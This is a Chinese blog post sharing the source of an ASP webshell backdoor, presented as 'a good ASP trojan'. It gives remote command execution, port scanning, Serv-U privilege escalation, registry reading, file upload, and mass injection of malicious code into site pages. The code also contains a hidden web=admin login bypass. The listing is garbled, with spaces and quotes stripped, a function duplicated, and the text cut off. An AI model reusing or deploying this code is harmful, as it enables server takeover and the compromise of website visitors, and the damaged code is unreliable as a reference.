一款不错的asp木马 黑色界面
2018-09-06 13:04
<%
Server.ScriptTimeout=999999999
Response.Buffer=true
OnErrorResumeNext
UserPass=643617密码
mName=BY:.尐飛后门名字
Copyright=注:请勿用于非法用途,否则后果作者概不负责版权
Server.ScriptTimeout=999999999
Response.Buffer=true
OnErrorResumeNext
subShowErr()
IfErrThen
RRS<br><ahref=javascript:history.back()><br>&
Err.Description&</a><br>
Err.Clear:Response.Flush
EndIf
endsub
SubRRS(str)
response.write(str)
EndSub
FunctionRePath(S)
RePath=Replace(S,\,\\)
EndFunction
FunctionRRePath(S)
RRePath=Replace(S,\\,\)
EndFunction
URL=Request.ServerVariables(URL)
ServerIP=Request.ServerVariables(LOCAL_ADDR)
Action=Request(Action)
RootPath=Server.MapPath(.)
serveru=request.servervariables(http_host)&url
serverp=userpass
FolderPath=Request(FolderPath)
FName=Request(FName)
BackUrl=<br><br><center><ahref=javascript:history.back()>返回
</a></center>
RRS<html><metahttp-equiv=Content-Typecontent=text/html;
charset=gb2312>
RRS<title>&mName1&-&ServerIP&</title>
RRS<styletype=text/css>
RRSbody,td{font-size:12px;background-color:#000000;color:#eee;}
RRSinput,select,textarea{font-size:12px;background-
color:#ddd;border:1pxsolid#fff}
RRS.C{background-color:#000000;border:0px}
RRS.cmd{background-color:#000;color:#FFF}
RRSbody{margin:0px;margin-left:4px;}
RRSa{color:#ddd;text-decoration:none;}a:hover
{color:red;background:#000}
RRS.am{color:#888;font-size:11px;}
RRS</style>
RRS<scriptlanguage=javascript>functionkillErrors(){returntrue;}
window.onerror=killErrors;
RRSfunctionyesok(){if(confirm(确认要执行此操作吗?))return
true;elsereturnfalse;}
RRSfunctionrunClock(){theTime=window.setTimeout(runClock(),
100);vartoday=newDate();vardisplay=today.toLocaleString
();window.status=→&AD&--+display;}runClock();
RRSfunctionShowFolder(Folder){top.addrform.FolderPath.value=
Folder;top.addrform.submit();}
RRSfunctionFullForm(FName,FAction){top.hideform.FName.value=
FName;if(FAction==CopyFile){DName=prompt(请输入复制到目标文件全
名称,FName);top.hideform.FName.value+=+DName;}elseif
(FAction==MoveFile){DName=prompt(请输入移动到目标文件全名
称,FName);top.hideform.FName.value+=+DName;}elseif
(FAction==CopyFolder){DName=prompt(请输入移动到目标文件夹全名称
,FName);top.hideform.FName.value+=+DName;}elseif
(FAction==MoveFolder){DName=prompt(请输入移动到目标文件夹全名称
,FName);top.hideform.FName.value+=+DName;}elseif
(FAction==NewFolder){DName=prompt(请输入要新建的文件夹全名
称,FName);top.hideform.FName.value=DName;}else{DName=Other;}
if(DName!=null){top.hideform.Action.value=
FAction;top.hideform.submit();}else{top.hideform.FName.value=;}}
RRS</script>
rrs<body
IfAction=thenRRSscroll=no
rrs>
DimObT(13,2)
ObT(0,0)=Scripting.FileSystemObject
ObT(0,2)=文件操作组件
ObT(1,0)=wscript.shell
ObT(1,2)=命令行执行组件
ObT(2,0)=ADOX.Catalog
ObT(2,2)=ACCESS建库组件
ObT(3,0)=JRO.JetEngine
ObT(3,2)=ACCESS压缩组件
ObT(4,0)=Scripting.Dictionary
ObT(4,2)=数据流上传辅助组件
ObT(5,2)=数据库连接组件
ObT(6,0)=Adodb.Stream
ObT(6,2)=数据流上传组件
ObT(7,0)=SoftArtisans.FileUp
ObT(7,2)=SA-FileUp文件上传组件
ObT(8,0)=LyfUpload.UploadFile
ObT(8,2)=刘云峰文件上传组件
ObT(9,0)=Persits.Upload.1
ObT(9,2)=ASPUpload文件上传组件
ObT(10,0)=JMail.SmtpMail
ObT(10,2)=JMail邮件收发组件
ObT(11,0)=CDONTS.NewMail
ObT(11,2)=虚拟SMTP发信组件
ObT(12,0)=SmtpMail.SmtpMail.1
ObT(12,2)=SmtpMail发信组件
ObT(13,0)=Microsoft.XMLHTTP
ObT(13,2)=数据传输组件
Fori=0To13
SetT=Server.CreateObject(ObT(i,0))
If-2147221005<>ErrThen
IsObj=√
Else
IsObj=×
Err.Clear
EndIf
SetT=Nothing
ObT(i,1)=IsObj
Next
IfFolderPath<>then
Session(FolderPath)=RRePath(FolderPath)
EndIf
IfSession(FolderPath)=Then
FolderPath=RootPath
Session(FolderPath)=FolderPath
Endif
FunctionMainForm()
RRS<formname=hideformmethod=postaction=&URL&
target=FileFrame>
RRS<inputtype=hiddenname=Action>
RRS<inputtype=hiddenname=FName>
RRS</form>
RRS<tablewidth=100%height=100%border=0cellpadding=0
cellspacing=0>
RRS<tr><tdheight=30colspan=2>
RRS<tablewidth=100%>
RRS<formname=addrformmethod=postaction=&URL&
target=_parent>
RRS<tr><tdwidth=60align=center>地址栏:</td><td>
RRS<inputname=FolderPathstyle=width:100%value=&Session
(FolderPath)&>
RRS</td><tdwidth=140align=center><inputname=Submit
type=submitvalue=转到><inputtype=submitvalue=刷新主窗口
onclick=FileFrame.location.reload()>
RRS</td></tr></form></table></td></tr><tr><tdwidth=170>
RRS<iframename=Leftsrc=?Action=MainMenuwidth=100%
height=100%frameborder=0></iframe></td>
RRS<td>
RRS<iframename=FileFramesrc=?Action=Show1Filewidth=100%
height=100%frameborder=1></iframe>
RRS</td></tr></table>
EndFunction
ifrequest(web)=adminthen
Session(web2a2dmin)=UserPass
URL()
endif
FunctionMainForm()
RRS<formname=hideformmethod=postaction=&URL&
target=FileFrame>
RRS<inputtype=hiddenname=Action>
RRS<inputtype=hiddenname=FName>
RRS</form>
RRS<tablewidth=100%height=100%border=0cellpadding=0
cellspacing=0>
RRS<tr><tdheight=30colspan=2>
RRS<tablewidth=100%>
RRS<formname=addrformmethod=postaction=&URL&
target=_parent>
RRS<tr><tdwidth=60align=center>地址栏:</td><td>
RRS<inputname=FolderPathstyle=width:100%value=&Session
(FolderPath)&>
RRS</td><tdwidth=140align=center><inputname=Submit
type=submitvalue=转到><inputtype=submitvalue=刷新主窗口
onclick=FileFrame.location.reload()>
RRS</td></tr></form></table></td></tr><tr><tdwidth=170>
RRS<iframename=Leftsrc=?Action=MainMenuwidth=100%
height=100%frameborder=0></iframe></td>
RRS<td>
RRS<iframename=FileFramesrc=?Action=Show1Filewidth=100%
height=100%frameborder=1></iframe>
RRS</td></tr></table>
EndFunction
FunctionMainMenu()
RRS<tablewidth=100%cellspacing=0cellpadding=0>
RRS<tr><tdheight=5></td></tr>
RRS<tr><td><center><ahref=&SiteURL2&><font
color=red>&mName2&</font></center></a><hrhight=1width=100%>
RRS</td></tr>
IfObT(0,1)=×Then
RRS<tr><tdheight=24>无权限</td></tr>
Else
RRS<tr><tdheight=22onmouseover=menu1.style.display=>↓查看硬
盘<divid=menu1style=width:100%;display=none
onmouseout=menu1.style.display=none>
SetABC=NewLBF:RRSABC.ShowDriver():SetABC=Nothing
RRS</div></td></tr><tr><tdheight=20><ahref=javascript:ShowFolder
(&RePath(WWWRoot)&)>->站点根目录</a></td></tr>
RRS<tr><tdheight=20><ahref=javascript:ShowFolder(&RePath
(RootPath)&)>→本程序目录</a></td></tr>
RRS<tr><tdheight=20><ahref=javascript:ShowFolder(C:\\Program
Files)>→ProgramFiles</a></td></tr>
RRS<tr><tdheight=20><ahref=javascript:ShowFolder(C:\\Documents
andSettings\\AllUsers\\Documents)>->Documents</a></td></tr>
RRS<tr><tdheight=20><ahref=javascript:ShowFolder(C:\\Documents
andSettings\\AllUsers\\ApplicationData\\Symantec\\pcAnywhere)>-
>pcAnywhere</a></td></tr>
RRS<tr><tdheight=20><ahref=javascript:ShowFolder(C:\\Documents
andSettings\\AllUsers\\「开始」菜单\\程序)>->开始<b>→</b>程序
<hr></a></td></tr>
EndIf
RRS<tr><tdheight=22><ahref=?Action=Coursetarget=FileFrame>→
系统服务-用户账号</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=getTerminalInfo
target=FileFrame>→终端端口-自动登录</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=ServerInfo
target=FileFrame>→服务信息-组件支持</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=Cmd1Shelltarget=FileFrame>
→执行CMD命令</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=ScanPorttarget=FileFrame>
→端口扫描器</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=Servutarget=FileFrame>→
Serv-u提权</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=ReadREGtarget=FileFrame>→
读取注册表</a></td></tr>
RRS<tr><tdheight=20><ahref=javascript:FullForm(&RePath
(Session(FolderPath)&\NewFolder)&,NewFolder)>→新建目录
<hr></a></td></tr>
RRS<tr><tdheight=20><ahref=?Action=EditFiletarget=FileFrame>
→新建文本</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=UpFiletarget=FileFrame>→
上传文件</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=kmumatarget=FileFrame>→查
找木马</b></a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=Cplgm&M=1target=FileFrame>
→高级挂马</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=Cplgm&M=2target=FileFrame>
→批量清马</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=Cplgm&M=3target=FileFrame>
→批量替换</a></td></tr>
RRS<tr><tdheight=22><ahref=?Action=plgmtarget=FileFrame></b>
→低级挂马</a></b></td></tr>
RRS<tr><tdheight=22><ahref=?Action=Logouttarget=_top>→退出登
录</a></td></tr>
RRS<tr><tdalign=center
style=color:red><hr>&Copyright2&</td></tr></table>
RRS</table>
EndFunction
SubunPack(thePath)
OnErrorResumeNext
Server.ScriptTimeOut=5000
Dimrs,ws,str,conn,stream,connStr,theFolder
str=Server.MapPath(.)&\
Setrs=CreateObject(ADODB.RecordSet)
Setstream=CreateObject(ADODB.Stream)
Setconn=CreateObject(ADODB.Connection)
connStr=Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=&thePath&;
conn.OpenconnStr
rs.OpenFileData,conn,1,1
stream.Open
stream.Type=1
DoUntilrs.Eof
theFolder=Left(rs(thePath),InStrRev(rs
(thePath),\))
IffsoX.FolderExists(str&theFolder)=False
Then
createFolder(str&theFolder)
EndIf
stream.SetEos()
stream.Writers(fileContent)
stream.SaveToFilestr&rs(thePath),2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Setws=Nothing
Setrs=Nothing
Setstream=Nothing
Setconn=Nothing
EndSub
SubcreateFolder(thePath)
Dimi
i=Instr(thePath,\)
DoWhilei>0
IffsoX.FolderExists(Left(thePath,i))=False
Then
fsoX.CreateFolder(Left(thePath,i-1))
EndIf
IfInStr(Mid(thePath,i+1),\)Then
i=i+Instr(Mid(thePath,i+1),\)
Else
i=0
EndIf
Loop
EndSub
FunctionCourse()
SI=<br><tablewidth=600bgcolor=menuborder=0cellspacing=1
cellpadding=0align=center>
SI=SI&<tr><tdheight=20colspan=3align=centerbgcolor=menu>系
统用户与服务</td></tr>
onerrorresumenext
foreachobjingetObject(WinNT://.)
err.clear
ifOBJ.StartType=then
SI=SI&<tr>
SI=SI&<tdheight=20bgcolor=#FFFFFF>
SI=SI&</td><tdbgcolor=#FFFFFF>
SI=SI&系统用户(组)
SI=SI&</td></tr>
SI0=<tr><tdheight=20bgcolor=#FFFFFF
colspan=2></td></tr>
endif
ifOBJ.StartType=2thenlx=自动
ifOBJ.StartType=3thenlx=手动
ifOBJ.StartType=4thenlx=禁用
ifLCase(mid(obj.path,4,3))<>winandOBJ.StartType=2then
SI1=SI1&<tr><tdheight=20
bgcolor=#FFFFFF>&obj.Name&</td><tdheight=20
bgcolor=#FFFFFF>&obj.DisplayName&<tr><tdheight=20
bgcolor=#FFFFFFcolspan=2>[启动类型:&lx&]<font
color=#FF0000>&obj.path&</font></td></tr>
else
SI2=SI2&<tr><tdheight=20
bgcolor=#FFFFFF>&obj.Name&</td><tdheight=20
bgcolor=#FFFFFF>&obj.DisplayName&<tr><tdheight=20
bgcolor=#FFFFFFcolspan=2>[启动类型:&lx&]<font
color=#3399FF>&obj.path&</font></td></tr>
endif
next
RRSSI&SI0&SI1&SI2&</table>
EndFunction
FunctionServerInfo()
SI=<br><tablewidth=80%bgcolor=menuborder=0cellspacing=1
cellpadding=0align=center>
SI=SI&<tr><tdheight=20colspan=3align=centerbgcolor=menu>服
务器组件信息</td></tr>
SI=SI&<tralign=center><tdheight=20width=200
bgcolor=#FFFFFF>服务器名</td><tdbgcolor=#FFFFFF></td><td
bgcolor=#FFFFFF>&request.serverVariables(SERVER_NAME)&</td></tr>
SI=SI&<formmethod=postaction=
name=ipform><tralign=center><tdheight=20
width=200bgcolor=#FFFFFF>服务器IP</td><td
bgcolor=#FFFFFF></td><tdbgcolor=#FFFFFF>
SI=SI&<inputtype=textname=ipsize=15
value=&Request.ServerVariables(LOCAL_ADDR)
&style=border:0px><inputtype=submitvalue=查
询style=border:0px><inputtype=hiddenname=action
value=2></td></tr></form>
SI=SI&<tralign=center><tdheight=20width=200
bgcolor=#FFFFFF>服务器时间</td><tdbgcolor=#FFFFFF></td><td
bgcolor=#FFFFFF>&now&</td></tr>
SI=SI&<tralign=center><tdheight=20width=200
bgcolor=#FFFFFF>服务器CPU数量</td><td
bgcolor=#FFFFFF></td><td
bgcolor=#FFFFFF>&Request.ServerVariables(NUMBER_OF_PROCESSORS)
&</td></tr>
SI=SI&<tralign=center><tdheight=20width=200
bgcolor=#FFFFFF>服务器操作系统</td><td
bgcolor=#FFFFFF></td><td
bgcolor=#FFFFFF>&Request.ServerVariables(OS)&</td></tr>
SI=SI&<tralign=center><tdheight=20width=200
bgcolor=#FFFFFF>WEB服务器版本</td><td
bgcolor=#FFFFFF></td><td
bgcolor=#FFFFFF>&Request.ServerVariables(SERVER_SOFTWARE)
&</td></tr>
Fori=0To13
SI=SI&<tralign=center><tdheight=20width=200
bgcolor=#FFFFFF>&ObT(i,0)&</td><tdbgcolor=#FFFFFF>&ObT(i,1)
&</td><tdbgcolor=#FFFFFFalign=left>&ObT(i,2)&</td></tr>
Next
RRSSI
EndFunction
FunctionDownFile(Path)
Response.Clear
SetOSM=CreateObject(ObT(6,0))
OSM.Open
OSM.Type=1
OSM.LoadFromFilePath
sz=InstrRev(path,\)+1
Response.AddHeaderContent-Disposition,attachment;filename=&
Mid(path,sz)
Response.AddHeaderContent-Length,OSM.Size
Response.Charset=UTF-8
Response.ContentType=application/octet-stream
Response.BinaryWriteOSM.Read
Response.Flush
OSM.Close
SetOSM=Nothing
EndFunction
FunctionHTMLEncode(S)
ifnotisnull(S)then
S=replace(S,>,>)
S=replace(S,<,<)
S=replace(S,CHR(39),')
S=replace(S,CHR(34),")
S=replace(S,CHR(20),)
HTMLEncode=S
endif
EndFunction
FunctionUpFile()
IfRequest(Action2)=PostThen
SetU=newUPC:SetF=U.UA(LocalFile)
UName=U.form(ToPath)
IfUName=OrF.FileSize=0then
SI=<br>请输入上传的完全路径后选择一个文件上传!
Else
F.SaveAsUName
IfErr.number=0Then
SI=<center><br><br><br>文件&UName&上传成功!</center>
Endif
EndIf
SetF=nothing:SetU=nothing
SI=SI&BackUrl
RRSSI
ShowErr()
Response.End
EndIf
SI=<br><br><br><tableborder=0cellpadding=0cellspacing=0
align=center>
SI=SI&<formname=UpFormmethod=postaction=&URL&?
Action=UpFile&Action2=Postenctype=multipart/form-data>
SI=SI&<tr><td>
SI=SI&上传路径:<inputname=ToPathvalue=&RRePath(Session
(FolderPath)&\diy3.asp)&size=40>
SI=SI&<inputname=LocalFiletype=filesize=25>
SI=SI&<inputtype=submitname=Submitvalue=上传>
SI=SI&</td></tr></form></table>
RRSSI
EndFunction
FunctionCmd1Shell()
checked=checked
IfRequest(SP)<>ThenSession(ShellPath)=Request(SP)
ShellPath=Session(ShellPath)
ifShellPath=ThenShellPath=diy3.asp
ifRequest(wscript)<>yesthenchecked=
IfRequest(cmd)<>ThenDefCmd=Request(cmd)
SI=<formmethod=post>
SI=SI&SHELL路径:<inputname=SPvalue=&ShellPath&
Style=width:70%>
SI=SI&<inputclass=ctype=checkboxname=wscript
value=yes&checked&>WScript.Shell
SI=SI&<inputname=cmdStyle=width:92%value=&DefCmd&><input
type=submitvalue=执行><textareaStyle=width:100%;height:440;
class=cmd>
IfRequest.Form(cmd)<>Then
ifRequest.Form(wscript)=yesthen
SetCM=CreateObject(ObT(1,0))
SetDD=CM.exec(ShellPath&/c&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
OnErrorResumeNext
Setws=Server.CreateObject(WScript.Shell)
Setws=Server.CreateObject(WScript.Shell)
Setfso=Server.CreateObject(Scripting.FileSystemObject)
szTempFile=server.mappath(cmd.txt)
Callws.Run(ShellPath&/c&DefCmd&>&szTempFile,0,True)
Setfs=CreateObject(Scripting.FileSystemObject)
SetoFilelcx=fs.OpenTextFile(szTempFile,1,False,0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Callfso.DeleteFile(szTempFile,True)
SI=SI&aaa
endif
EndIf
SI=SI&chr(13)&</textarea></form>
RRSSI
EndFunction
ifsession(web2a2dmin)<>UserPassthen
ifrequest.form(pass)<>then
ifrequest.form(pass)=UserPassthen
session(web2a2dmin)=UserPass
response.redirecturl
else
rrs<br><br><br><b><divalign=center><fontsize=14color=red>注:
请勿用于非法用。
上一篇:asp验证Ip格式的函数